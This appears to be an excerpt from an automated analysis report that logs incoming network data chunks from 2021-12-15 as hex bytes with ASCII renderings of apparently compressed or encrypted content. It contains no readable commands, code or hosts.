2021-12-15 13:13:49 UTC	129	IN	Data Raw: c9 25 12 09 d5 64 8d fd 7a ec 49 33 03 20 85 c5 79 f6 86 4a a3 e9 f9 9c 41 30 77 b7 09 86 82 2f e8 e4 d8 a3 d9 b1 96 9f 65 17 38 d8 a0 53 9c 73 0b ed 96 c9 2f 25 2f 4e df 42 84 21 2b 5b 01 31 8b d1 ef 23 a2 41 7a c3 80 7d 97 63 df a7 db 81 df 0a a0 a3 d9 09 cb d5 6d 3d 66 b4 e7 ad ba 1c be 58 ad e2 2a 8b 90 ea e1 00 8c 62 5f 65 2b cf a9 8f 7c 06 56 8c 18 07 3e 6f 4f 97 fd 73 e1 e8 5e fe a1 c0 0b f6 9c c5 c0 9b cb 3c a1 36 32 b8 54 17 5e ec 11 3a 45 14 9d f8 e2 b9 f8 0b 27 e8 a1 be 9d 81 f1 26 ad 5c fd db 41 7d 27 e5 4a 22 32 3c d7 1f 82 e0 a6 2d be da d9 2a c7 44 f7 96 c6 73 a8 74 e8 46 c2 1a ba e5 74 a4 91 e1 d4 bb 5c f9 ab 62 1c a8 bb b5 0d e5 75 21 e3 ea 7c 3e 89 d0 41 aa 98 fe bc da 8a 75 41 e1 87 a1 55 55 23 8d 26 d0 be 9a ea 00 34 67 3b 0e a4 89 ca Data Ascii: %dzI3 yJA0w/e8Ss/%/NB!+[1#Az}cm=fXb_e+\|V>oOs^<62T^:E'&\A}'J"2<-DstFt\bu!\|>AuAUU#&4g;
2021-12-15 13:13:49 UTC	130	IN	Data Raw: 25 e8 4b a5 06 2b c1 63 05 03 37 a2 78 ba 27 79 a1 a5 48 18 8b 9a 0a 79 1f 31 51 ff 67 26 93 df 86 fe e9 08 a7 68 62 4e 49 1c b7 be 70 1a 9c b3 dd 93 8b 9a d8 a6 58 63 f5 e3 38 e2 eb 50 f7 77 a6 19 96 79 ce 19 39 b6 a5 6a de f6 96 24 af 5d bb ec 5e 24 dc a6 a6 8c 2d dc 59 05 29 13 65 d7 42 bb 54 4a 76 a3 c6 5b 17 a4 1c b9 47 01 29 c0 49 dd 23 7e 5a 6c 07 fa 83 2f 80 3b c1 35 6a e6 48 89 04 72 c8 5d 58 ca e0 87 77 bd 46 ff e6 6e b2 fa 64 ca e5 4e 11 ab 47 7d f8 d7 c1 d6 86 68 4a b2 dc c5 9b af 5e 5e dc e9 1a 66 0f 5b a0 e7 1b eb 45 cd 33 cb 94 9b 53 7b b8 50 56 fc 1b 5b 72 a8 2b 40 74 ce 21 45 9b 4c 9a ea 1c 72 39 60 e8 c6 cf 6f 5d d3 de 1c ad ac 2d d2 eb 4e 35 96 fb 12 d7 76 cf 6b 62 46 96 49 44 10 98 98 d8 93 86 9a 2f b5 55 9b 53 da 2e c4 72 35 e2 1c 3e Data Ascii: %K+c7x'yHy1Qg&hbNIpXc8Pwy9j$]^$-Y)eBTJv[G)I#~Zl/;5jHr]XwFndNG}hJ^^f[E3S{PV[r+@t!ELr9`o]-N5vkbFID/US.r5>
2021-12-15 13:13:49 UTC	131	IN	Data Raw: 33 cd e9 c6 86 97 71 cb e6 11 64 5d c9 35 17 86 1c 13 3a c1 b1 56 c2 96 d7 0d e1 15 99 6d 9d 39 af e5 dd e6 4b 1d bb d3 1c 59 df ac 33 11 49 d8 f2 9e 63 4a 00 2d 16 87 02 c5 7e c7 6c fc 6b a3 1b 6a ae 22 f5 b6 f4 76 fd 30 de bb 64 10 4b 93 7a a5 bb a8 82 cd a7 07 05 83 f3 7f fc 67 71 51 3d d6 09 29 90 cb 66 6a 9d ac 4d 57 0e cb 7e db 30 e0 05 e8 97 a4 ee 8e b3 b4 36 51 0d 47 50 3f f3 92 85 4b 60 0b 03 34 fa 09 ed e8 7d 44 98 8d 90 5c d8 29 e8 29 0e ef a6 ca b4 5a a6 a7 7e 2d da cb 2e 26 e1 ae 91 b4 94 80 34 ae 60 9a 6f 78 3d 11 07 bb 69 db b1 e3 e4 5e ee e4 5e 3c 22 c3 d0 53 e0 47 c5 1f c7 26 39 db e9 5b ae 41 4c 4e 4b 4e 0b 62 44 de 66 38 22 0b 91 b8 d2 55 56 5e 61 3b 5d 2c 55 e2 9d 19 37 5f 07 0d 66 49 40 8a d5 2f 6e d9 1d f9 44 ca 85 f4 00 5b 42 a6 ac Data Ascii: 3qd]5:Vm9KY3IcJ-~lkj"v0dKzgqQ=)fjMW~06QGP?K`4}D\))Z~-.&4`ox=i^^<"SG&9[ALNKNbDf8"UV^a;],U7_fI@/nD[B
2021-12-15 13:13:49 UTC	133	IN	Data Raw: 94 70 3e 69 92 cf b5 0a 56 7d 6a 8e 73 ed c3 e0 fc d8 7f 7d e7 93 34 c4 40 22 3d bd f1 ff 70 94 79 af ba 5a 10 3e 37 5b d7 07 54 47 f4 90 e7 19 22 6c 8b 7a 8d 75 7e 66 ce 44 62 dc e9 2c d4 21 a9 5e 31 53 20 ca ed 7d cb 6f 43 1f e3 fa cf 42 38 6a 6d 4d cf 0d b4 38 a0 3c 02 ac 7a 70 a4 5c 65 df bf b2 59 64 ef c1 b7 f2 27 6e c4 42 25 39 b3 17 42 d4 9a e5 6b 01 43 47 c2 67 f3 17 8b 79 57 6d 5e 1d 8b 19 88 f6 db 62 d5 1e ab 87 a9 f6 0f 47 73 cd e1 46 0e ab ca c9 c4 4a da 84 8a bb 72 2f f6 f6 2c 02 67 6d 17 8a f7 69 fa 59 50 29 30 94 0b 2f 24 c0 c6 56 7f 57 61 f8 4d ee 70 ca 05 a1 cd 0e 1f f1 dc d1 e6 2d 3a be 7f 16 41 05 de b0 a5 76 2c ad 86 df 40 68 6c ce 39 d2 96 9e 3b 0a 95 78 d1 29 60 17 ab 63 37 ab 54 34 92 0a b8 6c d5 17 d0 2e b9 dd 40 00 4c 76 e1 6a 0a Data Ascii: p>iV}js}4@"=pyZ>7[TG"lzu~fDb,!^1S }oCB8jmM8<zp\eYd'nB%9BkCGgyWm^bGsFJr/,gmiYP)0/$VWaMp-:Av,@hl9;x)`c7T4l.@Lvj
2021-12-15 13:13:49 UTC	134	IN	Data Raw: 46 3d d7 d7 82 13 8b 6f 1c c4 2c 4b 98 18 26 68 05 2c af 9c 4b 36 f1 6d b5 ff 6d 05 64 f0 6e ea ee 81 b6 b1 a8 b3 ab 4f 25 9c 29 2f 63 ee 5f dc 9c 9a c8 95 52 06 71 da 2b 4c 72 7e d1 0e f0 03 a0 27 90 89 da 10 fc 81 66 fb 9e cc ed be 68 94 47 41 55 1e ee db 79 ae 38 7c 22 45 81 ba 75 9a e8 90 63 65 05 cb 65 d7 cd c5 a8 2c c5 6b 92 4a 9a 64 d3 8f 3d 1d 3c 17 84 68 2d 64 6e 8f a4 8a 5a 49 e9 4d d6 52 88 64 5f 5e 11 7e b1 05 fb 44 30 bf 77 7c 39 1a 7d 4e ba 36 0d a1 94 64 c2 d6 6c a5 70 db bb 51 2f 93 f1 f1 b1 fe bc 54 0d 28 42 5e 11 da 15 e3 fb bf 13 39 0d d0 04 e7 88 8e 20 24 bf 66 4a 5c df 06 c0 de c0 8e 63 a3 c8 5f 1d a4 7b 28 1b 0e 9e 63 3c 1f 19 9b 1e 73 3d af 8b f1 6c 67 3f c3 e9 04 9b 14 c6 b3 8e de 1c 0a 07 14 f4 cf b9 1e 7c ee 5a 69 ef af 5d 11 92 Data Ascii: F=o,K&h,K6mmdnO%)/c_Rq+Lr~'fhGAUy8\|"Eucee,kJd=<h-dnZIMRd_^~D0w\|9}N6dlpQ/T(B^9 $fJ\c_{(c<s=lg?\|Zi]
2021-12-15 13:13:49 UTC	135	IN	Data Raw: f8 e1 c6 2e 43 43 16 85 11 ab c2 b4 bc 31 e1 7e 2f 4e 88 b1 d7 16 bc 9b 3d 38 6f bb 8e af a6 e6 77 da 59 3c f0 4f cb 24 06 e0 0d 2a 29 24 3d ec f1 9e b2 6d e7 f4 68 5c a3 67 4e 30 38 49 13 57 eb 9c f9 00 c6 0e 94 15 f4 02 53 3e 34 ff 43 55 91 36 95 29 79 21 48 0f fb 33 56 fe 84 86 e2 26 d1 1d e4 3f db 14 94 56 a1 36 33 6a 9b aa 40 1b 0b d5 12 15 b0 88 2b fe a4 44 3c 1a 27 c3 e0 ff c6 18 22 01 2a a8 af f4 0b 03 75 c6 a5 cc 8a 7a 3c 5a ba dc 3b a1 00 9d 82 2b 79 16 5c d7 0a 65 1b 24 d0 93 92 e3 db ae 87 81 fb 6e a5 58 a0 c3 29 64 07 41 80 8f 0f 84 4f 57 f7 50 fc 23 25 19 ad f8 83 d4 1e 3d 96 b4 9e 28 44 27 fc 5b a3 88 bd 35 36 fc 20 9e fd ed 8e 6e 29 9f 7c 73 1b f2 8f d8 f4 d8 84 86 bc 74 4b ab f2 83 18 4b 5c 95 ff 8c fa fa a7 03 57 74 f6 2a 8f 33 d2 12 34 Data Ascii: .CC1~/N=8owY<O$)$=mh\gN08IWS>4CU6)y!H3V&?V63j@+D<'"uz<Z;+y\e$nX)dAOWP#%=(D'[56 n)\|stKK\Wt*34
2021-12-15 13:13:49 UTC	136	IN	Data Raw: 10 b2 40 30 ad 28 72 f0 db 74 b6 5c cc 58 ff 80 fe 43 d8 d8 3d fe 97 e0 8b 4e 23 43 47 7b fe 58 71 7f 5c 55 c0 26 b7 31 c2 6c 73 2a 02 d8 23 0c 38 22 1d c2 a1 63 eb e6 e7 62 3b 20 0b 61 82 a8 2f db 40 fb 51 71 d2 19 87 36 f0 ee 5e ab 1b 9f 16 2c c3 2c 6e d5 ed a4 d8 89 0f e9 60 84 76 d2 94 a4 ee 2a ad f8 b3 8e eb 89 b0 e9 12 92 68 ab 4c 21 ed 4d bb 4c e0 81 f2 9b 59 14 4f 27 f5 96 f5 37 db a4 88 0c 4a 8f 3a 79 91 c4 86 76 45 4b bd 68 f5 52 c2 62 6f 8e 05 6c 04 5b f9 78 fe a9 e2 42 91 80 27 c0 3c c6 29 21 a3 12 68 bf e3 97 e4 4e 11 29 fd 7d c9 ef 6a 1e e0 6e 04 54 7e 22 0f af f5 6e 45 dd 07 51 ad fe df bd cd 50 0b 96 fc 05 53 bf 86 70 9c 98 a9 62 51 9b ec ad fb 52 5f 5b 9c 9d 07 e8 fd e6 2d 50 20 e7 34 35 bb 52 4b 88 fd 97 c4 de 78 64 10 ad 37 f2 49 ea b3 Data Ascii: @0(rt\XC=N#CG{Xq\U&1ls#8"cb; a/@Qq6^,,n`vhL!MLYO'7J:yvEKhRbol[xB'<)!hN)}jnT~"nEQPSpbQR_[-P 45RKxd7I
2021-12-15 13:13:49 UTC	138	IN	Data Raw: 05 60 08 c4 18 8c c5 39 31 2b 22 cf 00 67 96 e5 31 66 dd 5f 48 4d 47 6f 7d 70 5a fd 34 65 cf 0f 78 93 20 41 15 cc 95 17 b4 6e 3d 9f 85 ad d4 9d 26 89 ec 82 79 36 f4 d1 0d 49 3a 40 dd b6 79 97 e2 fc 60 e6 d6 19 42 d8 d4 21 8d f5 51 ba a3 53 99 37 36 25 b3 3e a1 1f 3a 79 11 f8 09 f9 bf 66 d3 66 26 2b ee 4d 48 c6 dc af e0 e7 0f 84 24 59 1d e0 e7 21 84 c6 73 03 aa f3 4c 33 12 a2 3c a9 c6 5b 1f a5 c5 34 ec 65 47 3a 1a db 1a 84 d5 6d 3e 3c 7f e2 53 f8 dd 5a 9b 92 28 96 ca 56 74 9a 6b f3 e3 06 2f f7 18 71 4c bc 9b 8a b0 a6 9e 41 b4 ca 9d 94 3a f4 f6 3b 95 84 42 d8 d2 71 e0 ab 9a ea 89 f2 be a0 6e 6e e8 38 6e 24 fe d3 4b da 9a 68 8d 44 3d cd d0 8b a4 69 9d 6c de 85 1d 46 c3 0e 48 1a 5b b9 7e 4d 73 fd 13 d8 c5 47 e8 99 bd 3c f4 0f e2 d6 f8 4f b0 b6 c3 e1 7d dd ea Data Ascii: `91+"g1f_HMGo}pZ4ex An=&y6I:@y`B!QS76%>:yff&+MH$Y!sL3<[4eG:m><SZ(Vtk/qLA:;Bqnn8n$KhD=ilFH[~MsG<O}
2021-12-15 13:13:49 UTC	139	IN	Data Raw: b9 52 7a 86 2d ce 98 b9 75 49 4a 0e 68 5c 2f e0 17 32 4d b8 b7 79 7a f5 44 c4 33 e5 ba 1c 91 c6 bc b0 86 2c 1b c0 b6 5b 5c bc 80 f7 3e 60 34 3a f9 4f 0a d2 23 eb b1 83 12 8f a4 10 7f e7 ec 5c 3f 57 55 c6 45 16 41 28 2d 9a 0b 2c 76 4a 86 cb b6 a6 b8 0a 85 76 d3 b2 05 20 fa ea 4d fc 37 c7 ff 9d 03 2f df 62 28 72 fd 24 c1 c2 81 c4 a9 08 ad 4d 04 81 1e e0 86 15 fd 88 4b 52 3f bb 1c bf 44 1b 1f 40 95 d8 9a c0 12 d8 ee 2a 87 c1 ca 1c ef 8f 79 94 76 b9 e9 b7 44 da b5 f1 cd 8c 42 21 48 7b 61 6b e5 56 ef ec 56 a6 26 3b 33 f9 12 92 fb 29 5c ef d7 f5 ee 7b 67 7a a8 28 63 b8 31 11 bb c9 2e 44 81 16 7d 09 80 f1 41 8d 3c fa 99 d8 4e cc 53 37 2f d6 c6 f2 6e 91 49 da c0 12 e3 71 90 8a b8 75 ef 82 50 40 a1 aa 15 7f 67 29 20 11 a2 d2 10 3b 28 74 11 bf c2 67 2e ed 6f bc 99 Data Ascii: Rz-uIJh\/2MyzD3,[\>`4:O#\?WUEA(-,vJv M7/b(r$MKR?D@*yvDB!H{akVV&;3)\{gz(c1.D}A<NS7/nIquP@g) ;(tg.o
2021-12-15 13:13:49 UTC	140	IN	Data Raw: 2f 04 6c 13 72 cd e5 8a 6a 56 bc 7a 64 57 dd 37 17 08 80 b9 07 d7 02 22 06 45 d3 aa 83 48 da ea 52 01 69 06 1d ca 87 77 19 c0 08 6f aa ef dd 47 4a dc ae f3 0f 08 7d f3 eb 9d 3f a7 51 c7 49 f3 41 0a f6 af b7 06 5a d0 ce 48 40 3f 5e 59 e2 c9 b4 64 a1 87 6a ba 8d 45 61 9a f9 d9 64 5a bf 33 d2 9a da 39 72 8d e7 21 90 66 ca 33 77 f3 21 71 4c 61 ec a3 24 4b 68 b2 e0 a5 34 19 ae 04 1f f5 6f aa 31 92 e8 4f a2 a8 3b 41 a4 8e f9 84 f9 54 1d fe fc fa 57 a7 36 a1 8c d8 d0 a3 a0 ac da 21 7e 37 d9 33 ab 17 8f 18 ed 4d 4e e9 5d b8 a9 5f 42 38 b1 5e 9c ae 59 ce ea 47 ff 0b 23 c9 cf 6d 45 1f 8d ce 61 53 bf 64 1a 43 6b 53 65 6c 0c 6f 41 1d 39 fe 06 5b de 26 09 a4 98 bb ea 14 0b 54 66 2b 48 1f 38 4a 41 ba 6d af 3b 04 50 45 13 c4 2c 23 a9 96 08 c5 52 bb f2 81 2b 1a 52 b1 58 Data Ascii: /lrjVzdW7"EHRiwoGJ}?QIAZH@?^YdjEadZ39r!f3w!qLa$Kh4o1O;ATW6!~73MN]_B8^YG#mEaSdCkSeloA9[&Tf+H8JAm;PE,#R+RX
2021-12-15 13:13:49 UTC	141	IN	Data Raw: de 23 bc 69 8c 53 50 ca 29 f0 e6 fc 46 58 2f 9e 6d e3 31 74 f7 3d 20 dc 23 77 39 b1 3c 46 06 ba 33 25 a3 f1 00 7c de 33 f4 d4 9a a6 38 04 86 54 b3 2c 4f f1 f2 8c f8 b9 ee 9b 31 d7 41 8c 22 ba a4 bb 40 92 15 46 fd 80 c5 0f 12 bf 3b 50 a1 f8 db 6b 63 9f 11 88 55 24 58 2d e1 10 7f 27 33 26 fe c7 fe a3 20 14 29 f5 e8 30 46 6b 96 e8 79 0e 76 51 9d 8e 48 a0 33 60 97 0d 49 e0 c6 f7 7f 68 64 1a 24 1e e8 30 ca 89 0c d4 e6 c9 96 f5 c9 44 88 4c 88 37 36 ca 7a 09 1a ab 11 d8 df b0 a4 d0 89 12 0f 10 0b 62 77 9c a2 29 70 fd c2 e1 6f 08 70 85 53 47 50 19 92 51 40 a8 fc ff f2 30 6e 5a eb 11 4a 84 2c ba 27 b8 b4 72 7b 65 04 55 4e e8 57 8e 27 f6 72 c8 f3 5d c2 9e 18 e0 4e 9f ac 8f 4c 86 90 52 d6 87 aa d3 b6 56 b4 6b 72 16 a7 31 6d 8c 73 d0 cf fd 5d 4e d6 38 c9 dc ff 66 99 Data Ascii: #iSP)FX/m1t= #w9<F3%\|38T,O1A"@F;PkcU$X-'3& )0FkyvQH3`Ihd$0DL76zbw)popSGPQ@0nZJ,'r{eUNW'r]NLRVkr1ms]N8f
2021-12-15 13:13:49 UTC	143	IN	Data Raw: e0 1a d3 b2 38 04 4a 7c 15 54 bc 6d c8 eb 47 8f 98 6b 22 ec 0c a6 b8 2f 1a a7 c6 7f e3 25 fb e9 93 f2 52 20 02 7a bd 98 2c 68 98 36 92 61 4b ae f8 21 c4 ef 9e a5 65 bf 9c 78 a2 9f f9 6a fb 02 e7 f5 e2 13 20 28 01 4b f4 d4 cf aa c1 9d 94 c1 13 f9 08 ed 9e 5f 32 cd 39 ba d6 ea fc bf 62 ce aa 7b ce d3 11 6b 41 9f 4c fb 6f dc 83 64 4a ec 9c b7 45 34 ce fb 4c 2d f4 4d ed c6 71 ed 39 cd ed b5 76 e8 61 bb c3 57 23 e2 31 19 78 12 4f ca 23 e2 46 ba 52 df ce 5c a4 94 50 f6 9b f2 1a 5e eb ca 28 ad a2 6f 2c d5 34 64 f1 0f fd 9e 69 48 6a 45 6b 43 bd e9 14 2a 53 1b 5e c1 c4 92 a6 2a 7d aa 09 e2 f7 9e 37 a7 8a 9d d7 ee 37 00 db 09 20 86 c4 dc 9e e9 e2 ed f5 0a 3f 8d ab 6e 83 8d 36 d7 16 51 70 df b9 4d 61 38 e0 fd 5a 1d a0 d3 db 0b f3 11 1b 27 61 19 55 5e ab c1 07 01 d7 Data Ascii: 8J\|TmGk"/%R z,h6aK!exj (K_29b{kALodJE4L-Mq9vaW#1xO#FR\P^(o,4diHjEkCS^}77 ?n6QpMa8Z'aU^
2021-12-15 13:13:49 UTC	144	IN	Data Raw: 16 85 30 a9 51 d0 93 16 6a 27 22 a6 52 5c 11 20 bb d8 0c 4b d3 ca 85 d9 5f 3a 10 a3 02 b6 55 ca 1d 20 78 6c f5 62 72 c0 d9 a9 55 58 a7 36 d4 87 e2 16 ed bd 26 3c ca 1d 58 6e d2 cb c9 26 33 f1 70 97 58 35 0c f2 62 01 03 51 9b a3 05 99 39 3e ff 4b 17 be 58 0c 7f e8 25 a0 13 a1 e3 cd 29 8d 2e a3 ee 7c a6 1f 6b a0 17 09 98 14 a0 b1 03 42 13 f3 df ac f7 44 5c cb bd 2f 48 f8 72 54 02 8d ac dd 1f 99 9c 31 80 eb a7 7a 9a 95 15 ae 5b 23 ef a9 47 89 41 af ff 61 9c ac 57 df f3 8d 0a 7c d1 62 bf bd 9a a0 65 d3 34 26 74 f9 d2 89 13 9b 2b 31 7b e4 be dd 3c c1 97 f8 7b 99 0a 88 06 1c 5c d0 6b d3 91 3a c4 b8 90 14 03 da 74 d6 f9 49 f2 d8 4f 53 87 4f 3f 32 1d 47 5a 4d f3 96 19 ba 69 28 30 51 b1 16 ec 4b 9c 22 a5 d2 b6 99 ea ca 10 b8 c3 58 9d 83 95 7c 44 d1 48 b3 bc 80 bc Data Ascii: 0Qj'"R\ K_:U xlbrUX6&<Xn&3pX5bQ9>KX%).\|kBD\/HrT1z[#GAaW\|be4&t+1{<{\k:tIOSO?2GZMi(0QK"X\|DH
2021-12-15 13:13:49 UTC	145	IN	Data Raw: 61 59 bb 92 4c 71 c2 fc 17 ea c5 67 7d de a4 9e 0d 6d a5 8d 51 b6 71 6c 3a 5d 42 ba 36 0e 55 be 0d a5 2b c0 1c d8 84 9a 3b 1f 96 2f 33 93 46 03 6e b2 a0 e8 65 26 9a 8d 7f c5 56 ad 5d 3b 55 9b c5 91 6f 80 92 f2 82 71 54 74 33 4b b8 e5 17 fa 3e ea f4 90 64 0a c7 67 91 27 89 e1 f1 28 a6 05 8a ea fa 75 01 e4 b1 ad a8 62 a4 79 80 16 9b d1 51 50 15 28 7c 9f 20 b2 c0 98 d5 5d f2 a3 e8 9e a8 53 e7 3a a6 12 28 e7 98 47 4a 6c a1 52 23 3f e9 72 69 12 70 31 eb e9 4d f9 f1 1a 79 36 c7 cc 2b 1e 47 29 f3 a9 4f ad be 5a 9f 95 20 f7 6f 0a c1 87 d1 47 d9 c9 de 81 11 6d 84 5b 60 ba f9 66 54 83 81 a6 89 be 7c 5e 40 75 13 54 23 af aa 4d b5 1a b4 0e 43 54 7e 46 19 a7 38 4e bd f6 2b 1e 13 ec 03 6f e7 a8 d4 51 90 ed 2e 8c 19 cf 07 b4 9e b0 3f f6 0a 8b 49 a0 0f 69 cb fd 2f 7d b5 Data Ascii: aYLqg}mQql:]B6U+;/3Fne&V];UoqTt3K>dg'(ubyQP(\| ]S:(GJlR#?rip1My6+G)OZ oGm[`fT\|^@uT#MCT~F8N+oQ.?Ii/}
2021-12-15 13:13:49 UTC	146	IN	Data Raw: f1 6e 03 b9 31 6a a4 e8 e7 b6 5b de 9a c5 ff 34 60 91 67 42 77 b0 bf 0b ff aa 59 00 2a d3 92 69 3c 91 72 51 c6 bb 58 9a 8c e2 ac 41 88 3b ad d1 53 7c ba c6 ef bd 8f d8 40 a8 bf eb 17 87 11 4a 6f b1 02 47 77 ee b1 e8 e1 ee fc 17 c2 ff 1a e7 04 91 36 2b 84 12 ac f7 48 01 5d fa 04 e9 23 1e cc d2 0f f2 31 4d 7c 3e ab c3 ba 63 6d 2a a6 3a 69 8b 33 c8 56 f3 85 40 55 6d 1f a1 d4 a0 a8 0c 0e 97 cd 31 16 4b a7 e9 b5 50 5d f3 48 f9 3a c2 97 47 de 1f d7 64 ae 38 c5 a3 ad 3b 28 e2 c6 ef 80 3b 79 fe 97 5b 0b d0 16 b5 3e d5 37 13 9c e6 32 8b d1 c9 62 ef af ee e5 4d 8d ca 77 18 a5 70 e6 99 8d 37 04 5b 31 98 72 47 8f bc 8c b2 77 f8 b7 9d 31 04 58 bb 96 d7 6a 6f 19 4e d7 75 d3 52 b7 26 66 6b 50 3d 40 74 1c f4 18 fd 0b 2e 67 32 d8 bb dc 97 b7 95 32 40 33 d0 4b 6b c9 5c 12 Data Ascii: n1j[4`gBwYi<rQXA;S\|@JoGw6+H]#1M\|>cm:i3V@Um1KP]H:Gd8;(;y[>72bMwp7[1rGw1XjoNuR&fkP=@t.g22@3Kk\
2021-12-15 13:13:49 UTC	147	IN	Data Raw: fa 6f c4 b2 9b 5d ad 5c 1a 77 09 02 1e b4 89 a5 0a dd 09 0f 37 6c e6 81 d6 e0 fc 17 fb 37 90 35 94 65 29 c8 98 03 b3 e2 7d b4 ab 68 1e a5 3e 88 6e 09 79 2f e2 fa 09 f4 77 4b 52 f8 13 dc d6 cc 31 56 a7 0b f3 48 56 00 66 9c 6a 16 2d 28 b8 61 74 0f e4 5b 9b 14 8b 64 40 d4 4b 67 46 c6 0a 89 f5 a0 cd 3d 76 db 89 27 40 e1 f9 b4 bd 33 f5 57 80 b3 ca d8 7d 4e 3a e0 6a 19 ae 74 22 c3 da b1 91 01 66 64 b8 8e c3 4e 76 da 5e 2d 36 78 e1 6a b4 4c ae b2 bc f4 d1 7e da dc 44 b1 6e e2 e6 2a 30 b8 c9 45 07 d3 a0 71 9b 2f 5f 40 0b d4 0d 93 d3 9d 46 89 f4 61 a8 a8 db f8 fe 1c ac 9c 36 50 4e 60 f9 0b bc ad 63 b2 b7 80 72 b8 22 f0 7a ae 6f ec 5e ed b9 8e 3d f7 8d 4d 39 72 d3 73 9a 6b 0e 2f 55 66 5e 05 75 8f 6b a3 c6 13 20 a7 7c de d3 d9 a8 30 af 6d 88 53 01 fa 94 3c 68 04 99 Data Ascii: o]\w7l75e)}h>ny/wKR1VHVfj-(at[d@KgF=v'@3W}N:jt"fdNv^-6xjL~Dn*0Eq/_@Fa6PN`cr"zo^=M9rsk/Uf^uk \|0mS<h
2021-12-15 13:13:49 UTC	149	IN	Data Raw: 33 92 b4 61 17 38 3f 4f 9c 6f e7 66 1d 8b d0 bf 2d 1c dd ec bc fe 6a 54 4e 12 d8 2e dd c8 5f 4b 63 b3 ec f9 6c a7 b4 0d f5 9d 89 f6 25 70 33 f8 66 3f 7f 62 31 65 5a 2f e9 54 6e 80 fe 90 90 83 1d da dc 61 76 f8 88 3d 7c f3 fb 3c 02 87 d1 58 0f 45 32 24 c4 66 96 23 f0 92 35 61 6c 74 02 1f 2a 74 2f 3e 01 d8 e0 13 d7 0d b1 ce 42 50 ca ea c7 30 0e e8 1d ca 05 f2 58 92 54 15 f3 be 43 7c 7c 51 81 f9 7e 60 bf 78 60 29 31 14 7c 22 65 49 c2 9d 5d bf c2 db bf 08 ac fb e2 2d 8e e4 0b be fa 8e 50 b9 4d 0f c4 ab 7b c1 d3 b8 51 f1 a1 e4 08 66 f2 9d 83 a8 e5 2f 0d 78 fb 2b a2 3f 6d 2b c7 30 55 89 3e 4c bf 55 71 24 e7 fa 41 28 aa 6a da f8 ef e8 cb 46 0b 3a 1a 61 cd d7 09 af 9f 37 f6 27 11 1c b2 a4 3a c6 47 1c aa b7 90 0c ac f5 7f 02 86 8e c9 88 d8 dd 77 f4 11 1b 1f c7 2a Data Ascii: 3a8?Oof-jTN._Kcl%p3f?b1eZ/Tnav=\|<XE2$f#5altt/>BP0XTC\|\|Q~`x`)1\|"eI]-PM{Qf/x+?m+0U>LUq$A(jF:a7':Gw
2021-12-15 13:13:49 UTC	150	IN	Data Raw: 3b 51 1d 4f 74 ff a0 ec 90 91 ad 8c 0c a0 c6 e9 d5 c9 31 50 65 0e 97 13 79 fe d8 98 46 48 19 94 cc d6 d4 af a6 43 2b 6d 9b 5f 74 f8 6f 89 05 d6 6a 7e e8 33 3a e8 2a aa 4a c7 1e cd 04 33 ad 90 2c 86 fc 85 36 f8 0e 77 f2 93 8a 8d a3 25 ef 33 e8 aa d4 c2 7e c8 62 7c cb 0c 6f aa e8 e7 50 14 18 77 3c 4c f4 5c f8 c2 00 8b 0b c2 81 67 7e c7 86 ee b1 f8 ed 35 f6 5e c3 18 77 ce a2 dc 7d 46 fc 34 1f 9f 6f aa 74 0d 3c 6c 25 5f 25 51 3d 93 3f 9d 0d e9 2c b5 00 75 65 e3 bb 37 1d 38 01 45 9f 85 cc de 37 62 c9 2b b0 05 78 77 18 26 d7 00 32 bf a7 68 2a 1a f1 8b 21 b3 31 b3 31 c0 71 1b 89 3c b9 a8 7a e4 11 4f 83 cc cf 16 e5 a2 31 60 a1 21 ca d5 51 43 c4 87 05 10 f9 ef 2e a7 95 10 4c 12 c4 53 cc 08 51 ab 1f 39 19 b5 1e b2 a5 83 99 08 30 e0 56 fe 4f 76 82 34 4f 7e 21 f8 24 Data Ascii: ;QOt1PeyFHC+m_toj~3:J3,6w%3~b\|oPw<L\g~5^w}F4ot<l%_%Q=?,ue78E7b+xw&2h!11q<zO1`!QC.LSQ90VOv4O~!$
2021-12-15 13:13:49 UTC	151	IN	Data Raw: 8b 68 11 7a e2 7f 2a 59 91 97 38 83 b1 9c 27 46 26 ba e2 aa b1 52 7e 4f 28 35 29 cb 1c fc a5 a1 c3 02 65 08 f6 a0 b9 cc bd 7c 7b 57 f4 31 90 20 d3 8b 06 bd 47 51 2b c5 b0 42 a2 b3 e7 07 a0 c9 95 ab 09 e1 ea 83 75 8f d3 bf 2f 0e ac b1 bb d1 f5 6b d9 03 79 90 fb 26 77 99 a8 95 b1 3d ef cc 04 a5 be d8 f4 ac 0b 19 e4 e1 d4 4c 1d 34 07 27 49 05 13 ab 2a 16 5b ea 01 c8 ad a2 66 3f a1 a3 33 95 ff 06 da 9d 6b 94 de 0c 6f 1b 53 80 f2 c3 10 53 e3 f0 af 58 67 07 44 87 7a 77 3a c2 35 7d 34 c4 a3 68 68 bf fb 14 32 99 91 10 eb f9 6f 83 ab c6 cf 98 7c 91 54 b8 49 fb 86 9c 2c ff 2a c2 f7 75 39 99 3b 31 c6 fb 17 b4 a9 36 eb 71 17 91 9d 82 1b ff d1 1b d2 1b c5 f4 89 00 c6 b9 3a 6f fc 98 a8 07 22 6d fc 29 19 cf 09 69 df ed 5c aa 00 5f fd 14 2e 96 67 36 16 cf 3d 15 76 ec b2 Data Ascii: hzY8'F&R~O(5)e\|{W1 GQ+Bu/ky&w=L4'I[f?3koSSXgDzw:5}4hh2o\|TI,*u9;16q:o"m)i\_.g6=v
2021-12-15 13:13:49 UTC	152	IN	Data Raw: 51 8c a9 92 77 17 a6 bb 22 1c 8e 71 ff 31 91 09 f7 28 50 9d d7 12 47 d2 06 0b cb 96 80 00 df 90 42 cf 91 d3 7f e0 07 3b f7 26 09 4d cc 12 1a df e0 0b f4 89 33 c2 b1 18 f6 90 9c 51 96 8b bd 52 17 67 fc 77 62 8e 99 56 a7 8c ec 78 53 07 57 06 12 8b de 35 52 86 54 12 cd ab 1a ef c1 67 72 3b f2 01 41 da 7f fe ed 33 d0 6b 38 25 c4 6a 9d 82 cd 6e c8 ac f0 3c 21 5b 18 40 33 94 1c 6d e6 21 ea f6 e3 b4 8a 8c 42 2d af 9c f1 83 8f 24 af 76 24 f7 9d 57 87 07 81 fa ee 21 95 94 7f e2 cf 97 5a 50 ac 3d b2 3c 03 24 2e 95 f5 a2 38 9c fe 8f 13 3a 2e 44 4d e7 6c 0c e3 51 dc 64 dc 8b 52 39 36 f3 40 ec 8e f3 ee 0b 75 e9 c6 ae 1b 04 e8 01 29 8e c8 2c e1 f3 4a b4 55 5c 00 a4 e8 ce 8e 43 47 49 05 58 d9 1b c3 a3 60 0d ad b0 9b 74 84 e8 52 f4 52 db fa 31 59 58 a3 13 f4 ce 6a a7 25 